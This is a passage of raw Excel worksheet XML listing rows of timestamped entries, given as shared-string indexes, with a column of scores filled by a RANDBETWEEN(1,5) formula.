      <c r="D3760" t="s">
        <v>89</v>
      </c>
      <c r="E3760" t="s">
        <v>3646</v>
      </c>
      <c r="F3760">
        <f t="shared" ca="1" si="58"/>
        <v>1</v>
      </c>
    </row>
    <row r="3761" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3761" s="1">
        <v>43488.204895833333</v>
      </c>
      <c r="B3761" t="s">
        <v>5</v>
      </c>
      <c r="C3761" t="s">
        <v>2187</v>
      </c>
      <c r="E3761" s="2" t="s">
        <v>3647</v>
      </c>
      <c r="F3761">
        <f t="shared" ca="1" si="58"/>
        <v>4</v>
      </c>
    </row>
    <row r="3762" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3762" s="1">
        <v>43488.18613425926</v>
      </c>
      <c r="B3762" t="s">
        <v>5</v>
      </c>
      <c r="C3762" t="s">
        <v>41</v>
      </c>
      <c r="E3762" t="s">
        <v>3648</v>
      </c>
      <c r="F3762">
        <f t="shared" ca="1" si="58"/>
        <v>2</v>
      </c>
    </row>
    <row r="3763" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3763" s="1">
        <v>43488.175509259258</v>
      </c>
      <c r="B3763" t="s">
        <v>5</v>
      </c>
      <c r="C3763" t="s">
        <v>197</v>
      </c>
      <c r="E3763" s="2" t="s">
        <v>3649</v>
      </c>
      <c r="F3763">
        <f t="shared" ca="1" si="58"/>
        <v>3</v>
      </c>
    </row>
    <row r="3764" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3764" s="1">
        <v>43488.15966435185</v>
      </c>
      <c r="B3764" t="s">
        <v>19</v>
      </c>
      <c r="C3764" t="s">
        <v>50</v>
      </c>
      <c r="E3764" s="2" t="s">
        <v>3650</v>
      </c>
      <c r="F3764">
        <f t="shared" ca="1" si="58"/>
        <v>2</v>
      </c>
    </row>
    <row r="3765" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3765" s="1">
        <v>43488.155011574076</v>
      </c>
      <c r="B3765" t="s">
        <v>5</v>
      </c>
      <c r="C3765" t="s">
        <v>1510</v>
      </c>
      <c r="E3765" t="s">
        <v>3651</v>
      </c>
      <c r="F3765">
        <f t="shared" ca="1" si="58"/>
        <v>5</v>
      </c>
    </row>
    <row r="3766" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3766" s="1">
        <v>43488.149965277778</v>
      </c>
      <c r="B3766" t="s">
        <v>13</v>
      </c>
      <c r="C3766" t="s">
        <v>41</v>
      </c>
      <c r="E3766" t="s">
        <v>3653</v>
      </c>
      <c r="F3766">
        <f t="shared" ca="1" si="58"/>
        <v>4</v>
      </c>
    </row>
    <row r="3767" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3767" s="1">
        <v>43488.149548611109</v>
      </c>
      <c r="B3767" t="s">
        <v>19</v>
      </c>
      <c r="C3767" t="s">
        <v>314</v>
      </c>
      <c r="E3767" s="2" t="s">
        <v>3654</v>
      </c>
      <c r="F3767">
        <f t="shared" ca="1" si="58"/>
        <v>1</v>
      </c>
    </row>
    <row r="3768" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3768" s="1">
        <v>43488.149340277778</v>
      </c>
      <c r="B3768" t="s">
        <v>19</v>
      </c>
      <c r="C3768" t="s">
        <v>461</v>
      </c>
      <c r="E3768" t="s">
        <v>3655</v>
      </c>
      <c r="F3768">
        <f t="shared" ca="1" si="58"/>
        <v>3</v>
      </c>
    </row>
    <row r="3769" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3769" s="1">
        <v>43488.132835648146</v>
      </c>
      <c r="B3769" t="s">
        <v>19</v>
      </c>
      <c r="C3769" t="s">
        <v>173</v>
      </c>
      <c r="E3769" s="2" t="s">
        <v>3656</v>
      </c>
      <c r="F3769">
        <f t="shared" ca="1" si="58"/>
        <v>4</v>
      </c>
    </row>
    <row r="3770" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3770" s="1">
        <v>43488.120810185188</v>
      </c>
      <c r="B3770" t="s">
        <v>5</v>
      </c>
      <c r="C3770" t="s">
        <v>29</v>
      </c>
      <c r="E3770" t="s">
        <v>3657</v>
      </c>
      <c r="F3770">
        <f t="shared" ca="1" si="58"/>
        <v>3</v>
      </c>
    </row>
    <row r="3771" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3771" s="1">
        <v>43488.076273148145</v>
      </c>
      <c r="B3771" t="s">
        <v>19</v>
      </c>
      <c r="C3771" t="s">
        <v>724</v>
      </c>
      <c r="E3771" t="s">
        <v>3658</v>
      </c>
      <c r="F3771">
        <f t="shared" ca="1" si="58"/>
        <v>5</v>
      </c>
    </row>
    <row r="3772" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3772" s="1">
        <v>43488.075983796298</v>
      </c>
      <c r="B3772" t="s">
        <v>19</v>
      </c>
      <c r="C3772" t="s">
        <v>73</v>
      </c>
      <c r="E3772" s="2" t="s">
        <v>3659</v>
      </c>
      <c r="F3772">
        <f t="shared" ca="1" si="58"/>
        <v>3</v>
      </c>
    </row>
    <row r="3773" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3773" s="1">
        <v>43488.036365740743</v>
      </c>
      <c r="B3773" t="s">
        <v>5</v>
      </c>
      <c r="C3773" t="s">
        <v>140</v>
      </c>
      <c r="D3773" t="s">
        <v>141</v>
      </c>
      <c r="E3773" t="s">
        <v>3660</v>
      </c>
      <c r="F3773">
        <f t="shared" ca="1" si="58"/>
        <v>5</v>
      </c>
    </row>
    <row r="3774" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3774" s="1">
        <v>43488.030844907407</v>
      </c>
      <c r="B3774" t="s">
        <v>19</v>
      </c>
      <c r="C3774" t="s">
        <v>3049</v>
      </c>
      <c r="E3774" t="s">
        <v>3661</v>
      </c>
      <c r="F3774">
        <f t="shared" ca="1" si="58"/>
        <v>2</v>
      </c>
    </row>
    <row r="3775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3775" s="1">
        <v>43487.85833333333</v>
      </c>
      <c r="B3775" t="s">
        <v>19</v>
      </c>
      <c r="C3775" t="s">
        <v>10</v>
      </c>
      <c r="D3775" t="s">
        <v>89</v>
      </c>
      <c r="E3775" t="s">
        <v>3662</v>
      </c>
      <c r="F3775">
        <f t="shared" ca="1" si="58"/>
        <v>2</v>
      </c>
    </row>
    <row r="3776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3776" s="1">
        <v>43487.856446759259</v>
      </c>
      <c r="B3776" t="s">
        <v>5</v>
      </c>
      <c r="C3776" t="s">
        <v>73</v>
      </c>
      <c r="E3776" t="s">
        <v>3663</v>
      </c>
      <c r="F3776">
        <f t="shared" ca="1" si="58"/>
        <v>3</v>
      </c>
    </row>
    <row r="3777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3777" s="1">
        <v>43487.822754629633</v>
      </c>
      <c r="B3777" t="s">
        <v>5</v>
      </c>
      <c r="C3777" t="s">
        <v>408</v>
      </c>
      <c r="E3777" t="s">
        <v>3664</v>
      </c>
      <c r="F3777">
        <f t="shared" ca="1" si="58"/>
        <v>4</v>
      </c>
    </row>
    <row r="3778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3778" s="1">
        <v>43487.822106481479</v>
      </c>
      <c r="B3778" t="s">
        <v>5</v>
      </c>
      <c r="C3778" t="s">
        <v>408</v>
      </c>
      <c r="E3778" t="s">
        <v>3665</v>
      </c>
      <c r="F3778">
        <f t="shared" ref="F3778:F3841" ca="1" si="59">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="3779" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A3779" s="1">
        <v>43487.816643518519</v>
      </c>
      <c r="B3779" t="s">
        <v>5</v>
      </c>
      <c r="C3779" t="s">
        <v>6</v>
      </c>
      <c r="D3779" t="s">
        <v>25</v>
      </c>
      <c r="E3779" s="2" t="s">
        <v>3666</v>
      </c>
      <c r="F3779">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3780" s="1">
        <v>43487.801631944443</v>
      </c>
      <c r="B3780" t="s">
        <v>5</v>
      </c>
      <c r="C3780" t="s">
        <v>10</v>
      </c>
      <c r="D3780" t="s">
        <v>163</v>
      </c>
      <c r="E3780" t="s">
        <v>3667</v>
      </c>
      <c r="F3780">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3781" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3781" s="1">
        <v>43487.798217592594</v>
      </c>
      <c r="B3781" t="s">
        <v>19</v>
      </c>
      <c r="C3781" t="s">
        <v>10</v>
      </c>
      <c r="D3781" t="s">
        <v>46</v>
      </c>
      <c r="E3781" s="2" t="s">
        <v>3668</v>
      </c>
      <c r="F3781">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3782" s="1">
        <v>43487.771527777775</v>
      </c>
      <c r="B3782" t="s">
        <v>13</v>
      </c>
      <c r="C3782" t="s">
        <v>10</v>
      </c>
      <c r="D3782" t="s">
        <v>46</v>
      </c>
      <c r="E3782" t="s">
        <v>3669</v>
      </c>
      <c r="F3782">
        <f t="shared" ca="1" si="59"/>
        <v>2</v>
      </c>
    </row>
    <row r="3783" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3783" s="1">
        <v>43487.748854166668</v>
      </c>
      <c r="B3783" t="s">
        <v>13</v>
      </c>
      <c r="C3783" t="s">
        <v>2545</v>
      </c>
      <c r="E3783" s="2" t="s">
        <v>3670</v>
      </c>
      <c r="F3783">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3784" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3784" s="1">
        <v>43487.714513888888</v>
      </c>
      <c r="B3784" t="s">
        <v>5</v>
      </c>
      <c r="C3784" t="s">
        <v>10</v>
      </c>
      <c r="D3784" t="s">
        <v>20</v>
      </c>
      <c r="E3784" t="s">
        <v>3671</v>
      </c>
      <c r="F3784">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3785" s="1">
        <v>43487.712384259263</v>
      </c>
      <c r="B3785" t="s">
        <v>5</v>
      </c>
      <c r="C3785" t="s">
        <v>10</v>
      </c>
      <c r="D3785" t="s">
        <v>20</v>
      </c>
      <c r="E3785" t="s">
        <v>3671</v>
      </c>
      <c r="F3785">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3786" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3786" s="1">
        <v>43487.711898148147</v>
      </c>
      <c r="B3786" t="s">
        <v>5</v>
      </c>
      <c r="C3786" t="s">
        <v>10</v>
      </c>
      <c r="D3786" t="s">
        <v>20</v>
      </c>
      <c r="E3786" t="s">
        <v>3671</v>
      </c>
      <c r="F3786">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3787" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3787" s="1">
        <v>43487.692083333335</v>
      </c>
      <c r="B3787" t="s">
        <v>5</v>
      </c>
      <c r="C3787" t="s">
        <v>10</v>
      </c>
      <c r="D3787" t="s">
        <v>17</v>
      </c>
      <c r="E3787" s="2" t="s">
        <v>3672</v>
      </c>
      <c r="F3787">
        <f t="shared" ca="1" si="59"/>
        <v>2</v>
      </c>
    </row>
    <row r="3788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3788" s="1">
        <v>43487.689733796295</v>
      </c>
      <c r="B3788" t="s">
        <v>13</v>
      </c>
      <c r="C3788" t="s">
        <v>10</v>
      </c>
      <c r="D3788" t="s">
        <v>36</v>
      </c>
      <c r="E3788" t="s">
        <v>3673</v>
      </c>
      <c r="F3788">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3789" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3789" s="1">
        <v>43487.683437500003</v>
      </c>
      <c r="B3789" t="s">
        <v>5</v>
      </c>
      <c r="C3789" t="s">
        <v>10</v>
      </c>
      <c r="D3789" t="s">
        <v>89</v>
      </c>
      <c r="E3789" t="s">
        <v>3674</v>
      </c>
      <c r="F3789">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3790" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A3790" s="1">
        <v>43487.67863425926</v>
      </c>
      <c r="B3790" t="s">
        <v>5</v>
      </c>
      <c r="C3790" t="s">
        <v>6</v>
      </c>
      <c r="D3790" t="s">
        <v>25</v>
      </c>
      <c r="E3790" s="2" t="s">
        <v>3675</v>
      </c>
      <c r="F3790">
        <f t="shared" ca="1" si="59"/>
        <v>2</v>
      </c>
    </row>
    <row r="3791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3791" s="1">
        <v>43487.663564814815</v>
      </c>
      <c r="B3791" t="s">
        <v>1305</v>
      </c>
      <c r="C3791" t="s">
        <v>60</v>
      </c>
      <c r="E3791" t="s">
        <v>3676</v>
      </c>
      <c r="F3791">
        <f t="shared" ca="1" si="59"/>
        <v>2</v>
      </c>
    </row>
    <row r="3792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3792" s="1">
        <v>43487.663506944446</v>
      </c>
      <c r="B3792" t="s">
        <v>19</v>
      </c>
      <c r="C3792" t="s">
        <v>10</v>
      </c>
      <c r="D3792" t="s">
        <v>86</v>
      </c>
      <c r="E3792" t="s">
        <v>3677</v>
      </c>
      <c r="F3792">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3793" s="1">
        <v>43487.662476851852</v>
      </c>
      <c r="B3793" t="s">
        <v>13</v>
      </c>
      <c r="C3793" t="s">
        <v>10</v>
      </c>
      <c r="D3793" t="s">
        <v>6</v>
      </c>
      <c r="E3793" t="s">
        <v>3678</v>
      </c>
      <c r="F3793">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3794" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3794" s="1">
        <v>43487.638321759259</v>
      </c>
      <c r="B3794" t="s">
        <v>19</v>
      </c>
      <c r="C3794" t="s">
        <v>10</v>
      </c>
      <c r="D3794" t="s">
        <v>163</v>
      </c>
      <c r="E3794" s="2" t="s">
        <v>3679</v>
      </c>
      <c r="F3794">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3795" s="1">
        <v>43487.633055555554</v>
      </c>
      <c r="B3795" t="s">
        <v>19</v>
      </c>
      <c r="C3795" t="s">
        <v>10</v>
      </c>
      <c r="D3795" t="s">
        <v>89</v>
      </c>
      <c r="E3795" t="s">
        <v>3680</v>
      </c>
      <c r="F3795">
        <f t="shared" ca="1" si="59"/>
        <v>2</v>
      </c>
    </row>
    <row r="3796" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3796" s="1">
        <v>43487.619201388887</v>
      </c>
      <c r="B3796" t="s">
        <v>5</v>
      </c>
      <c r="C3796" t="s">
        <v>10</v>
      </c>
      <c r="D3796" t="s">
        <v>158</v>
      </c>
      <c r="E3796" s="2" t="s">
        <v>3681</v>
      </c>
      <c r="F3796">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3797" s="1">
        <v>43487.604502314818</v>
      </c>
      <c r="B3797" t="s">
        <v>19</v>
      </c>
      <c r="C3797" t="s">
        <v>10</v>
      </c>
      <c r="D3797" t="s">
        <v>178</v>
      </c>
      <c r="E3797" t="s">
        <v>3682</v>
      </c>
      <c r="F3797">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3798" s="1">
        <v>43487.593773148146</v>
      </c>
      <c r="B3798" t="s">
        <v>13</v>
      </c>
      <c r="C3798" t="s">
        <v>10</v>
      </c>
      <c r="D3798" t="s">
        <v>263</v>
      </c>
      <c r="E3798" t="s">
        <v>3683</v>
      </c>
      <c r="F3798">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3799" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3799" s="1">
        <v>43487.590497685182</v>
      </c>
      <c r="B3799" t="s">
        <v>19</v>
      </c>
      <c r="C3799" t="s">
        <v>6</v>
      </c>
      <c r="D3799" t="s">
        <v>114</v>
      </c>
      <c r="E3799" s="2" t="s">
        <v>3684</v>
      </c>
      <c r="F3799">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3800" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3800" s="1">
        <v>43487.589050925926</v>
      </c>
      <c r="B3800" t="s">
        <v>5</v>
      </c>
      <c r="C3800" t="s">
        <v>10</v>
      </c>
      <c r="D3800" t="s">
        <v>158</v>
      </c>
      <c r="E3800" s="2" t="s">
        <v>3681</v>
      </c>
      <c r="F3800">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3801" s="1">
        <v>43487.570949074077</v>
      </c>
      <c r="B3801" t="s">
        <v>5</v>
      </c>
      <c r="C3801" t="s">
        <v>10</v>
      </c>
      <c r="D3801" t="s">
        <v>36</v>
      </c>
      <c r="E3801" t="s">
        <v>3685</v>
      </c>
      <c r="F3801">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3802" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3802" s="1">
        <v>43487.560798611114</v>
      </c>
      <c r="B3802" t="s">
        <v>5</v>
      </c>
      <c r="C3802" t="s">
        <v>6</v>
      </c>
      <c r="D3802" t="s">
        <v>114</v>
      </c>
      <c r="E3802" s="2" t="s">
        <v>3686</v>
      </c>
      <c r="F3802">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3803" s="1">
        <v>43487.545092592591</v>
      </c>
      <c r="B3803" t="s">
        <v>1305</v>
      </c>
      <c r="C3803" t="s">
        <v>60</v>
      </c>
      <c r="E3803" t="s">
        <v>3687</v>
      </c>
      <c r="F3803">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3804" s="1">
        <v>43487.536851851852</v>
      </c>
      <c r="B3804" t="s">
        <v>13</v>
      </c>
      <c r="C3804" t="s">
        <v>10</v>
      </c>
      <c r="D3804" t="s">
        <v>151</v>
      </c>
      <c r="E3804" t="s">
        <v>3688</v>
      </c>
      <c r="F3804">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3805" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3805" s="1">
        <v>43487.533402777779</v>
      </c>
      <c r="B3805" t="s">
        <v>19</v>
      </c>
      <c r="C3805" t="s">
        <v>10</v>
      </c>
      <c r="D3805" t="s">
        <v>112</v>
      </c>
      <c r="E3805" t="s">
        <v>3689</v>
      </c>
      <c r="F3805">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3806" s="1">
        <v>43487.514652777776</v>
      </c>
      <c r="B3806" t="s">
        <v>5</v>
      </c>
      <c r="C3806" t="s">
        <v>10</v>
      </c>
      <c r="D3806" t="s">
        <v>6</v>
      </c>
      <c r="E3806" t="s">
        <v>3690</v>
      </c>
      <c r="F3806">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3807" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3807" s="1">
        <v>43487.504120370373</v>
      </c>
      <c r="B3807" t="s">
        <v>5</v>
      </c>
      <c r="C3807" t="s">
        <v>10</v>
      </c>
      <c r="D3807" t="s">
        <v>80</v>
      </c>
      <c r="E3807" t="s">
        <v>3691</v>
      </c>
      <c r="F3807">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3808" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A3808" s="1">
        <v>43487.502175925925</v>
      </c>
      <c r="B3808" t="s">
        <v>13</v>
      </c>
      <c r="C3808" t="s">
        <v>82</v>
      </c>
      <c r="E3808" s="2" t="s">
        <v>3692</v>
      </c>
      <c r="F3808">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3809" s="1">
        <v>43487.500856481478</v>
      </c>
      <c r="B3809" t="s">
        <v>19</v>
      </c>
      <c r="C3809" t="s">
        <v>10</v>
      </c>
      <c r="D3809" t="s">
        <v>94</v>
      </c>
      <c r="E3809" t="s">
        <v>3693</v>
      </c>
      <c r="F3809">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3810" s="1">
        <v>43487.498784722222</v>
      </c>
      <c r="B3810" t="s">
        <v>5</v>
      </c>
      <c r="C3810" t="s">
        <v>6</v>
      </c>
      <c r="D3810" t="s">
        <v>194</v>
      </c>
      <c r="E3810" t="s">
        <v>3694</v>
      </c>
      <c r="F3810">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3811" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3811" s="1">
        <v>43487.488680555558</v>
      </c>
      <c r="B3811" t="s">
        <v>1305</v>
      </c>
      <c r="C3811" t="s">
        <v>60</v>
      </c>
      <c r="E3811" s="2" t="s">
        <v>3695</v>
      </c>
      <c r="F3811">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3812" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3812" s="1">
        <v>43487.48741898148</v>
      </c>
      <c r="B3812" t="s">
        <v>13</v>
      </c>
      <c r="C3812" t="s">
        <v>65</v>
      </c>
      <c r="E3812" s="2" t="s">
        <v>3696</v>
      </c>
      <c r="F3812">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3813" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A3813" s="1">
        <v>43487.486481481479</v>
      </c>
      <c r="B3813" t="s">
        <v>19</v>
      </c>
      <c r="C3813" t="s">
        <v>41</v>
      </c>
      <c r="E3813" s="2" t="s">
        <v>3697</v>
      </c>
      <c r="F3813">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3814" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3814" s="1">
        <v>43487.485277777778</v>
      </c>
      <c r="B3814" t="s">
        <v>13</v>
      </c>
      <c r="C3814" t="s">
        <v>10</v>
      </c>
      <c r="D3814" t="s">
        <v>163</v>
      </c>
      <c r="E3814" s="2" t="s">
        <v>3698</v>
      </c>
      <c r="F3814">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3815" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3815" s="1">
        <v>43487.485266203701</v>
      </c>
      <c r="B3815" t="s">
        <v>13</v>
      </c>
      <c r="C3815" t="s">
        <v>10</v>
      </c>
      <c r="D3815" t="s">
        <v>163</v>
      </c>
      <c r="E3815" s="2" t="s">
        <v>3698</v>
      </c>
      <c r="F3815">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3816" s="1">
        <v>43487.484537037039</v>
      </c>
      <c r="B3816" t="s">
        <v>35</v>
      </c>
      <c r="C3816" t="s">
        <v>60</v>
      </c>
      <c r="E3816">
        <v>632666076</v>
      </c>
      <c r="F3816">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3817" s="1">
        <v>43487.480879629627</v>
      </c>
      <c r="B3817" t="s">
        <v>13</v>
      </c>
      <c r="C3817" t="s">
        <v>6</v>
      </c>
      <c r="D3817" t="s">
        <v>25</v>
      </c>
      <c r="E3817" t="s">
        <v>3699</v>
      </c>
      <c r="F3817">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3818" s="1">
        <v>43487.475428240738</v>
      </c>
      <c r="B3818" t="s">
        <v>5</v>
      </c>
      <c r="C3818" t="s">
        <v>48</v>
      </c>
      <c r="E3818" t="s">
        <v>3700</v>
      </c>
      <c r="F3818">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3819" s="1">
        <v>43487.442291666666</v>
      </c>
      <c r="B3819" t="s">
        <v>19</v>
      </c>
      <c r="C3819" t="s">
        <v>10</v>
      </c>
      <c r="D3819" t="s">
        <v>330</v>
      </c>
      <c r="E3819" t="s">
        <v>3701</v>
      </c>
      <c r="F3819">
        <f t="shared" ca="1" si="59"/>
        <v>2</v>
      </c>
    </row>
    <row r="3820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3820" s="1">
        <v>43487.439004629632</v>
      </c>
      <c r="B3820" t="s">
        <v>19</v>
      </c>
      <c r="C3820" t="s">
        <v>10</v>
      </c>
      <c r="D3820" t="s">
        <v>89</v>
      </c>
      <c r="E3820" t="s">
        <v>3702</v>
      </c>
      <c r="F3820">
        <f t="shared" ca="1" si="59"/>
        <v>4</v>
      </c>
    </row>
    <row r="3821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3821" s="1">
        <v>43487.438981481479</v>
      </c>
      <c r="B3821" t="s">
        <v>19</v>
      </c>
      <c r="C3821" t="s">
        <v>10</v>
      </c>
      <c r="D3821" t="s">
        <v>89</v>
      </c>
      <c r="E3821" t="s">
        <v>3702</v>
      </c>
      <c r="F3821">
        <f t="shared" ca="1" si="59"/>
        <v>5</v>
      </c>
    </row>
    <row r="3822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3822" s="1">
        <v>43487.433252314811</v>
      </c>
      <c r="B3822" t="s">
        <v>19</v>
      </c>
      <c r="C3822" t="s">
        <v>6</v>
      </c>
      <c r="D3822" t="s">
        <v>194</v>
      </c>
      <c r="E3822" t="s">
        <v>3703</v>
      </c>
      <c r="F3822">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3823" s="1">
        <v>43487.430775462963</v>
      </c>
      <c r="B3823" t="s">
        <v>19</v>
      </c>
      <c r="C3823" t="s">
        <v>10</v>
      </c>
      <c r="D3823" t="s">
        <v>36</v>
      </c>
      <c r="E3823" t="s">
        <v>3704</v>
      </c>
      <c r="F3823">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3824" s="1">
        <v>43487.428854166668</v>
      </c>
      <c r="B3824" t="s">
        <v>5</v>
      </c>
      <c r="C3824" t="s">
        <v>10</v>
      </c>
      <c r="D3824" t="s">
        <v>6</v>
      </c>
      <c r="E3824" t="s">
        <v>3705</v>
      </c>
      <c r="F3824">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3825" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3825" s="1">
        <v>43487.417870370373</v>
      </c>
      <c r="B3825" t="s">
        <v>19</v>
      </c>
      <c r="C3825" t="s">
        <v>71</v>
      </c>
      <c r="E3825" s="2" t="s">
        <v>3706</v>
      </c>
      <c r="F3825">
        <f t="shared" ca="1" si="59"/>
        <v>2</v>
      </c>
    </row>
    <row r="3826" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3826" s="1">
        <v>43487.41375</v>
      </c>
      <c r="B3826" t="s">
        <v>19</v>
      </c>
      <c r="C3826" t="s">
        <v>535</v>
      </c>
      <c r="E3826" s="2" t="s">
        <v>3707</v>
      </c>
      <c r="F3826">
        <f t="shared" ca="1" si="59"/>
        <v>3</v>
      </c>
    </row>
    <row r="3827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3827" s="1">
        <v>43487.412129629629</v>
      </c>
      <c r="B3827" t="s">
        <v>19</v>
      </c>
      <c r="C3827" t="s">
        <v>10</v>
      </c>
      <c r="D3827" t="s">
        <v>20</v>
      </c>
      <c r="E3827" t="s">
        <v>3708</v>
      </c>
      <c r="F3827">
        <f t="shared" ca="1" si="59"/>
        <v>1</v>
      </c>
    </row>
    <row r="3828" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3828" s="1">
        <v>43487.406863425924</v>
      </c>
      <c r="B3828" t="s">
        <v>5</v>
      </c>
      <c r="C3828" t="s">
        <v>6</v>
      </c>
      <c r="D3828" t="s">
        <v>25</v>
      </c>
      <c r="E3828" s="2" t="s">
        <v>3709</v>
      </c>
      <c r="F3828">
